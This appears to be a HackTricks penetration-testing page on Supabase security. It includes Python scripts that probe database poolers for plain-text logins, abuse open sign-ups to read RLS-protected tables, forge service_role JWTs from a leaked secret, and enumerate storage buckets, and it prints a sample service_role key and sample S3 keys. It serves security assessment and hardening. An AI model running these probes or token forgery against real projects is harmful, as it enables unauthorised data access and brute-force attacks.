# Supabase Security


## Basic Information

According to their landing page: Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.

### Subdomain

Basically, when a project is created the user receives a `supabase.co` subdomain such as `jnanozjdybtpqgcwhdiz.supabase.co`. The subdomain is the project's "ref" and shows up again as the database username and inside the API keys, so it is the first thing to collect when assessing a Supabase-backed application.

### Database config

This information can be found at a link like https://supabase.com/dashboard/project/<project-id>/settings/database

The database is deployed in some AWS region and is reached through Supabase's connection pooler with a connection string like: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this one was created in `us-west-1`). The username is `postgres.` followed by the project ref (the subdomain), and the password is the one the user set when creating the project.

So, because the subdomain is public and doubles as the username, and the set of AWS regions (and therefore pooler hostnames) is small, an attacker can enumerate the pooler host and attempt to brute force the database password. A strong password, rotating it if it may have leaked, and the network restrictions described below are the mitigations.

This section also has options to:

  • Reset the database password

  • Configure connection pooling

  • Configure SSL: reject plain-text connections (plain-text connections are accepted by default, so SSL enforcement has to be switched on explicitly)

  • Configure the disk size

  • Apply network restrictions and bans (allow-lists of client IP ranges that may reach the database)
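
The following script is an added example (not code from the original page or from Supabase) that checks the two points above: it derives the pooler hostname for each candidate AWS region from the project ref, and tests whether the pooler still accepts a plain-text (non-SSL) Postgres connection. It speaks the PostgreSQL wire protocol directly with the standard library, sending a StartupMessage without the usual SSLRequest first; a server that enforces SSL answers with an ErrorResponse, one that does not answers with an AuthenticationRequest, which means the password would also travel unencrypted. `PROJECT_REF` is the subdomain from this page; `REGIONS` is an assumed, incomplete list; the ErrorResponse text in the comments is constructed for illustration. If network restrictions are enabled for the project, the connection is simply refused from a non-allow-listed IP, which is the expected result.

```python
"""Check which AWS region hosts a Supabase project's pooler and whether it
accepts plain-text Postgres connections (no SSL). Added example, not
Supabase code; REGIONS is an assumed subset of the regions Supabase offers."""
import socket
import struct

PROJECT_REF = "jnanozjdybtpqgcwhdiz"          # subdomain / project ref from this page
REGIONS = ["us-west-1", "us-east-1", "eu-central-1", "ap-southeast-1"]  # assumed subset
POOLER_PORT = 5432                             # session-mode port from the connection string above


def pooler_host(region):
    """Pooler hostname pattern taken from the connection string on this page."""
    return f"aws-0-{region}.pooler.supabase.com"


def build_startup_message(user, database="postgres"):
    """PostgreSQL protocol 3.0 StartupMessage: int32 total length, int32
    version (196608 = 3.0), NUL-separated key/value pairs, final NUL.
    No SSLRequest is sent first, so this is a deliberately plain-text attempt."""
    params = b"".join(k.encode() + b"\x00" + v.encode() + b"\x00"
                      for k, v in (("user", user), ("database", database)))
    body = struct.pack("!I", 196608) + params + b"\x00"
    return struct.pack("!I", len(body) + 4) + body


def classify_response(data):
    """Interpret the first backend message that follows a plain-text startup.
    'R' = AuthenticationRequest (server is happy to continue in the clear);
    'E' = ErrorResponse (fields are <code byte><text>NUL..., 'M' is the message)."""
    if len(data) < 5:
        return "no-reply"
    tag = data[0:1]
    length = struct.unpack("!I", data[1:5])[0]
    if tag == b"R":
        auth_type = struct.unpack("!I", data[5:9])[0]   # 3 cleartext, 5 md5, 10 SASL
        return f"plaintext-accepted (auth request type {auth_type})"
    if tag == b"E":
        fields = {}
        for field in data[5:1 + length].split(b"\x00"):
            if field:
                fields[chr(field[0])] = field[1:].decode(errors="replace")
        return "plaintext-rejected: " + fields.get("M", "?")
    return f"unexpected message {tag!r}"


def probe(host, port, user, timeout=5):
    """Open a TCP connection, send the plain-text startup and classify the answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_startup_message(user))
            return classify_response(sock.recv(4096))
    except OSError as err:                       # refused/timeout: wrong region or network restrictions
        return f"unreachable ({err})"


if __name__ == "__main__":
    for region in REGIONS:
        print(region, probe(pooler_host(region), POOLER_PORT, f"postgres.{PROJECT_REF}"))
```

Run it from the IP you are testing from; "plaintext-accepted" on any region means SSL enforcement is off and a brute-force attempt could also be carried out without TLS, while "plaintext-rejected" with an SSL-related message shows the setting is on.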

### API config

This information can be found at a link like https://supabase.com/dashboard/project/<project-id>/settings/api

The URL to reach the Supabase API of your project will look like: https://jnanozjdybtpqgcwhdiz.supabase.co.

### anon api keys

It will also generate an anon API key (`role: "anon"`), such as: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`, which the client application needs in order to talk to the API. Because it ships inside the web or mobile client it is expected to be exposed; Row Level Security is what limits what it can read. It is a plain HS256 JWT, so its claims (project ref, role, issue and expiry time) can be read by anyone.

The REST API for talking to this service is documented in the Supabase docs, but the most interesting endpoints are:

<details>

<summary>Signup (/auth/v1/signup)</summary>

```http
POST /auth/v1/signup HTTP/2
Host: id.io.net
Content-Length: 90
X-Client-Info: supabase-js-web/2.39.2
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Content-Type: application/json;charset=UTF-8
Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cloud.io.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cloud.io.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```

</details>

<details>

<summary>Login (/auth/v1/token?grant_type=password)</summary>

```http
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
Content-Length: 80
X-Client-Info: supabase-js-web/2.39.2
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Content-Type: application/json;charset=UTF-8
Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cloud.io.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cloud.io.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```

</details>

So, whenever you find a client that uses Supabase and learn the subdomain it was given (a company subdomain may simply be a CNAME to its Supabase subdomain, as `id.io.net` is in the capture above), you can try to **create a new account on the platform through the Supabase API**. Both requests only need the anon key, sent as `apikey` and as the `Authorization: Bearer` value; if the project has sign-ups disabled the endpoint refuses the request, so this is a cheap first check.
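
The exchange above, replayed as an added example (not code from the original page or from Supabase): it performs the sign-up and password login with only the public anon key, interprets the sign-up answer, and then reuses the returned user JWT against the PostgREST endpoint to see what a self-registered user is allowed to read. `PROJECT_URL`, `ANON_KEY`, `EMAIL`, `PASSWORD` and `TABLE` are placeholders you must replace, and the sample responses used to describe `classify_signup` are constructed from GoTrue's documented behaviour.

```python
"""Probe a Supabase project for open sign-ups and what a fresh user can read.
Added example, not Supabase code; all constants below are placeholders."""
import json
import urllib.error
import urllib.request

PROJECT_URL = "https://jnanozjdybtpqgcwhdiz.supabase.co"  # assumed: target subdomain or its CNAME
ANON_KEY = "eyJ...anon-key-from-the-client-bundle..."        # assumed: replace with the real anon key
EMAIL = "test@example.com"                                   # assumed test identity
PASSWORD = "SomeCOmplexPwd239."
TABLE = "profiles"                                           # assumed table name to test RLS against


def build_request(base_url, path, apikey, body=None, bearer=None, method=None):
    """Headers Supabase expects: the project key in `apikey` and a JWT in
    `Authorization`. Before login the bearer is the anon key itself; after
    login it is the user's access token, which is what RLS evaluates."""
    headers = {
        "apikey": apikey,
        "Authorization": "Bearer " + (bearer or apikey),
        "Content-Type": "application/json",
    }
    data = None if body is None else json.dumps(body).encode()
    if method is None:
        method = "GET" if data is None else "POST"
    return urllib.request.Request(base_url + path, data=data, headers=headers, method=method)


def call(req):
    """Send the request and return (status, parsed JSON or raw text); 4xx answers are data, not exceptions."""
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            status, raw = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        status, raw = err.code, err.read()
    try:
        return status, json.loads(raw or b"null")
    except ValueError:
        return status, raw.decode(errors="replace")


def signup(base_url, apikey, email, password):
    return call(build_request(base_url, "/auth/v1/signup", apikey,
                              {"email": email, "password": password}))


def login(base_url, apikey, email, password):
    return call(build_request(base_url, "/auth/v1/token?grant_type=password", apikey,
                              {"email": email, "password": password}))


def classify_signup(status, body):
    """Interpret the sign-up answer: a session at sign-up means no email
    confirmation is required; a bare user object means confirmation is pending;
    anything else means sign-ups are closed or the request was rejected."""
    if status == 200 and isinstance(body, dict) and body.get("access_token"):
        return "open: session issued at sign-up (no email confirmation)"
    if status == 200 and isinstance(body, dict) and body.get("id"):
        return "open: account created, email confirmation pending"
    return f"closed or rejected (HTTP {status})"


if __name__ == "__main__":
    status, body = signup(PROJECT_URL, ANON_KEY, EMAIL, PASSWORD)
    print("signup:", classify_signup(status, body))
    status, body = login(PROJECT_URL, ANON_KEY, EMAIL, PASSWORD)
    if status == 200 and isinstance(body, dict) and body.get("access_token"):
        # Whatever comes back here is what RLS grants to any self-registered `authenticated` user.
        rows_status, rows = call(build_request(
            PROJECT_URL, f"/rest/v1/{TABLE}?select=*&limit=5", ANON_KEY, bearer=body["access_token"]))
        print("rest:", rows_status, rows)
    else:
        print("login:", status, body)
```

The REST query is the part worth reading carefully: the anon key stays in `apikey` while the user's token goes in `Authorization`, so any table whose policy is merely `TO authenticated USING (true)` is exposed to everyone who can sign up.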

### secret / service\_role api keys

A secret API key is also generated with **`role: "service_role"`**. This key must stay secret, because requests made with it **bypass Row Level Security** entirely; finding it in a frontend bundle, mobile app or public repository means full read/write access to every table.

The key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`

### JWT Secret

A **JWT Secret** is also generated so the application can **create and sign custom JWT tokens** that the API will accept. Both API keys above are HS256 JWTs signed with this same secret, so whoever obtains it can mint a token with `role: "service_role"` themselves; treat the JWT Secret as at least as sensitive as the service_role key.
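
To make the three sections above concrete, the following added example (not code from the original page or from Supabase) decodes the claims of the two keys printed on this page with the standard library, classifies a key found in a client bundle as public or secret, and shows what the JWT Secret buys an attacker: an HS256 token with `role: "service_role"` that the API cannot tell apart from the real service_role key. `DEMO_SECRET` is a made-up value; the real secret is never needed to read claims, only to sign or verify.

```python
"""Read Supabase API-key JWTs, flag a leaked service_role key, and mint a
service_role token from the JWT Secret. Added example, not Supabase code;
DEMO_SECRET is constructed for the demo."""
import base64
import hashlib
import hmac
import json
import time

# Both keys are the ones shown on this page.
ANON_KEY = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0."
            "sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk")
SERVICE_ROLE_KEY = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                    "eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ."
                    "0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354")
DEMO_SECRET = "this-is-not-a-real-supabase-jwt-secret"   # constructed; stands in for the project's JWT Secret


def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_claims(token):
    """Return (header, payload) without checking the signature: JWT bodies are not encrypted."""
    header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def classify_key(token):
    """What a key found in a JS bundle, mobile app or repository means."""
    _, claims = decode_claims(token)
    role = claims.get("role")
    if role == "service_role":
        return "SECRET: service_role key, bypasses RLS, must never ship to clients"
    if role == "anon":
        return "public: anon key, RLS still applies"
    return f"custom role {role!r}"


def sign_hs256(claims, secret):
    """Build a compact JWT signed with HMAC-SHA256, the algorithm Supabase keys use."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims))
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(mac)


def verify_hs256(token, secret):
    """Constant-time signature check; True only if `secret` signed this token."""
    signing_input, _, signature = token.rpartition(".")
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(mac, _b64url_decode(signature))


def mint_service_role(project_ref, secret, lifetime=3600):
    """What a leaked JWT Secret buys: a token equivalent to the service_role key."""
    now = int(time.time())
    claims = {"iss": "supabase", "ref": project_ref, "role": "service_role",
              "iat": now, "exp": now + lifetime}
    return sign_hs256(claims, secret)


if __name__ == "__main__":
    for key in (ANON_KEY, SERVICE_ROLE_KEY):
        print(classify_key(key), decode_claims(key)[1])
    forged = mint_service_role("jnanozjdybtpqgcwhdiz", DEMO_SECRET)
    print(classify_key(forged), verify_hs256(forged, DEMO_SECRET))
```

Run `classify_key` over every `eyJ...` string you pull out of a client build; an anon key is expected, a service_role key is a finding. The same decoder also shows the `exp` claim, which for the keys above is about 10 years after issue, so a leaked key does not expire on its own and must be rotated.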

## Authentication

### Signups

<div data-gb-custom-block data-tag="hint" data-style='success'>

By **default**, Supabase lets **new users create accounts** in your project through the API endpoints described above.

</div>

However, by default these new accounts **must confirm their email address** before they can log in. Turning email confirmation off lets people log in without ever verifying the address, and enabling **"Allow anonymous sign-ins"** lets them obtain a session without supplying an email at all. Either way they receive the `public` and `authenticated` roles, so any RLS policy written for `authenticated` now applies to anyone on the internet, which can expose **unexpected data**.\
It is also a bad idea financially, because Supabase charges per active user, so anyone can create users, log in, and the bill is yours:

<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>

### Passwords & sessions

It's possible to set a minimum password length (only 6 characters by default), character requirements (none by default) and to reject passwords that appear in known breaches (checked against HaveIBeenPwned).\
**Strengthening these is recommended, since the defaults are weak** and the login endpoint above is reachable by anyone holding the anon key.

* User Sessions: configure how user sessions behave (time-box, single session per user...)
* Bot and Abuse Protection: a CAPTCHA can be enabled on sign-up and login.

### SMTP Settings

It's possible to configure a custom SMTP server for sending the confirmation, magic-link and password-reset emails.

### Advanced Settings

* Set the access token (JWT) expiry time (3600 seconds by default)
* Enable detection and revocation of potentially compromised refresh tokens (reuse detection) and the reuse interval
* MFA: set how many MFA factors can be enrolled at once per user (10 by default)
* Max Direct Database Connections: maximum number of connections used by Auth (10 by default)
* Max Request Duration: maximum time an Auth request is allowed to take (10s by default)

## Storage

<div data-gb-custom-block data-tag="hint" data-style='success'>

Supabase allows **storing files** and serving them over a URL (it is backed by S3 buckets). Whether a file is reachable with the anon key, or with no key at all, depends on the bucket being marked public and on the RLS policies on `storage.objects`.

</div>

* Set the upload file size limit (50MB by default)
* S3-compatible access is provided through a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
* It's possible to **request S3 access keys**, consisting of an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`); these grant access to all buckets of the project regardless of RLS, so treat them like the service_role key
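
As an added example for the Storage section (not code from the original page or from Supabase), the script below lists a bucket through the object-list endpoint that supabase-js calls for `storage.from(bucket).list()`, using only the anon key, and turns the answer into a set of findings with the public download URL of every entry. Whether anything comes back depends on the bucket's RLS policies, and whether the public URL actually serves the file depends on the bucket being marked public. `PROJECT_URL`, `ANON_KEY` and `BUCKET` are placeholders; the sample listing used to describe `summarize` is constructed.

```python
"""Enumerate a Supabase Storage bucket with only the anon key and derive the
public URL of each object. Added example, not Supabase code."""
import json
import urllib.error
import urllib.request

PROJECT_URL = "https://jnanozjdybtpqgcwhdiz.supabase.co"  # assumed: target project
ANON_KEY = "eyJ...anon-key-from-the-client-bundle..."        # assumed: replace with the real anon key
BUCKET = "avatars"                                           # assumed bucket name (often visible in the frontend)


def list_objects_request(base_url, apikey, bucket, prefix="", limit=100, offset=0):
    """POST /storage/v1/object/list/<bucket> with the paging body supabase-js sends."""
    body = json.dumps({"prefix": prefix, "limit": limit, "offset": offset}).encode()
    return urllib.request.Request(
        f"{base_url}/storage/v1/object/list/{bucket}", data=body, method="POST",
        headers={"apikey": apikey, "Authorization": "Bearer " + apikey,
                 "Content-Type": "application/json"})


def public_url(base_url, bucket, name):
    """URL that serves the object without any credentials if the bucket is public."""
    return f"{base_url}/storage/v1/object/public/{bucket}/{name}"


def list_objects(base_url, apikey, bucket, prefix=""):
    """Return (status, parsed JSON); a 4xx is data (usually an RLS denial), not an exception."""
    req = list_objects_request(base_url, apikey, bucket, prefix)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"null")


def summarize(base_url, bucket, status, body):
    """Turn a listing into (kind, name, public_url) tuples. Folder entries come
    back with `metadata: null`; files carry size and mimetype in metadata."""
    if status != 200 or not isinstance(body, list):
        return []
    findings = []
    for obj in body:
        name = obj.get("name")
        kind = "folder" if obj.get("metadata") is None else "file"
        findings.append((kind, name, public_url(base_url, bucket, name)))
    return findings


if __name__ == "__main__":
    status, body = list_objects(PROJECT_URL, ANON_KEY, BUCKET)
    for kind, name, url in summarize(PROJECT_URL, BUCKET, status, body) or [("-", f"HTTP {status}", body)]:
        print(kind, name, url)
```

A non-empty listing with the anon key means the `storage.objects` SELECT policy is open to `anon`; if the bucket is also public, every URL printed downloads without credentials.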

## Edge Functions

It's also possible to **store secrets** in Supabase that are **available to edge functions** as environment variables. They can be created and deleted from the web UI, but their values cannot be read back there; anyone who can deploy an edge function to the project can still read them from inside the function, so deploy rights are effectively read access to every secret.

<div data-gb-custom-block data-tag="hint" data-style='success'>

Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>
